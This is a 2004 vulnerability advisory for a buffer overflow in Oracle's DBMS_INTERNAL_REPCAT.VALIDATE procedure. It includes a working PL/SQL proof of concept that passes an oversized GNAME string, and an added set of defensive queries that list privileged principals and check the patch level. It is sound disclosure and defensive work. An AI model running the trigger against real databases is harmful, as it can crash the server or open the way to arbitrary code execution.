#35 - Buffer overflow in procedure VALIDATE of DBMS_INTERNAL_REPCAT package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Medium
Details:
When the VALIDATE procedure is called with a long string in the GNAME parameter, a buffer overflow occurs.
To reproduce the overflow, execute the following PL/SQL block:
DECLARE
    RET_VALUE_X123      BINARY_INTEGER;
    P_GNAME             VARCHAR2(32767);
    P_CHECK_GENFLAGS    BOOLEAN;
    P_CHECK_VALID_OBJS  BOOLEAN;
    P_CHECK_LINKS_SCHED BOOLEAN;
    P_CHECK_LINKS       BOOLEAN;
    P_ERROR_MSG_ID      NUMBER;
    P_ERROR_NUM_ID      NUMBER;
    AAA                 VARCHAR2(32767);
BEGIN
    -- Build the oversized GNAME value: 'A' doubled 13 times gives 8192
    -- characters; the final line triples it to 24576 characters.
    AAA := 'A';
    AAA := AAA || AAA;
    AAA := AAA || AAA;
    AAA := AAA || AAA;
    AAA := AAA || AAA;
    AAA := AAA || AAA;
    AAA := AAA || AAA;
    AAA := AAA || AAA;
    AAA := AAA || AAA;
    AAA := AAA || AAA;
    AAA := AAA || AAA;
    AAA := AAA || AAA;
    AAA := AAA || AAA;
    AAA := AAA || AAA;
    AAA := AAA || AAA || AAA;
    P_GNAME := AAA;
    -- All remaining parameters are set to harmless values; only GNAME matters.
    P_CHECK_GENFLAGS    := FALSE;
    P_CHECK_VALID_OBJS  := FALSE;
    P_CHECK_LINKS_SCHED := FALSE;
    P_CHECK_LINKS       := FALSE;
    P_ERROR_MSG_ID      := 1;
    P_ERROR_NUM_ID      := 1;
    RET_VALUE_X123 := SYS.DBMS_INTERNAL_REPCAT.VALIDATE(
        GNAME             => P_GNAME,
        CHECK_GENFLAGS    => P_CHECK_GENFLAGS,
        CHECK_VALID_OBJS  => P_CHECK_VALID_OBJS,
        CHECK_LINKS_SCHED => P_CHECK_LINKS_SCHED,
        CHECK_LINKS       => P_CHECK_LINKS,
        ERROR_MSG_ID      => P_ERROR_MSG_ID,
        ERROR_NUM_ID      => P_ERROR_NUM_ID);
END;
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or the SYSDBA role, and by any user granted EXECUTE permission on the DBMS_INTERNAL_REPCAT package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause a denial of service (DoS) by killing the Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). Oracle 10g is not vulnerable.
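Added here as a defender's check, not part of the original advisory: the SQL below enumerates the principals that hold the access the analysis describes and reports the installed release so it can be compared against the fix level. It assumes a DBA session in SQL*Plus and the standard Oracle data-dictionary views named in the comments; the package and role names are taken from the advisory.

```sql
-- Added check (not from the advisory). Run as a DBA in SQL*Plus.
-- Assumes the standard views DBA_TAB_PRIVS, DBA_ROLE_PRIVS, V$PWFILE_USERS
-- and V$VERSION are available to the session.

-- 1. Principals granted EXECUTE on the package directly (users, roles, PUBLIC).
SELECT grantee, grantable
FROM   dba_tab_privs
WHERE  owner      = 'SYS'
AND    table_name = 'DBMS_INTERNAL_REPCAT'
AND    privilege  = 'EXECUTE'
ORDER BY grantee;

-- 2. Everyone reached through a role that holds that grant, following nested
--    role grants (EXECUTE_CATALOG_ROLE is typically granted on to other roles
--    and users, so a direct-grant listing alone understates exposure).
SELECT DISTINCT grantee AS principal, granted_role AS via_role, LEVEL AS depth
FROM   dba_role_privs
START WITH granted_role IN (
       SELECT grantee
       FROM   dba_tab_privs
       WHERE  owner      = 'SYS'
       AND    table_name = 'DBMS_INTERNAL_REPCAT'
       AND    privilege  = 'EXECUTE')
CONNECT BY PRIOR grantee = granted_role
ORDER BY depth, principal;

-- 3. Accounts in the password file with SYSDBA, also named in the analysis.
SELECT username
FROM   v$pwfile_users
WHERE  sysdba = 'TRUE';

-- 4. Installed release, to compare against the fix in Patchset 4 (9.2.0.5).
SELECT banner
FROM   v$version
WHERE  banner LIKE 'Oracle%';
```

Every principal returned by the first three queries can reach the vulnerable procedure on an instance that has not been patched to 9.2.0.5; beyond applying the patchset, revoking EXECUTE grants on the package that are not operationally required reduces the set of accounts able to trigger the overflow.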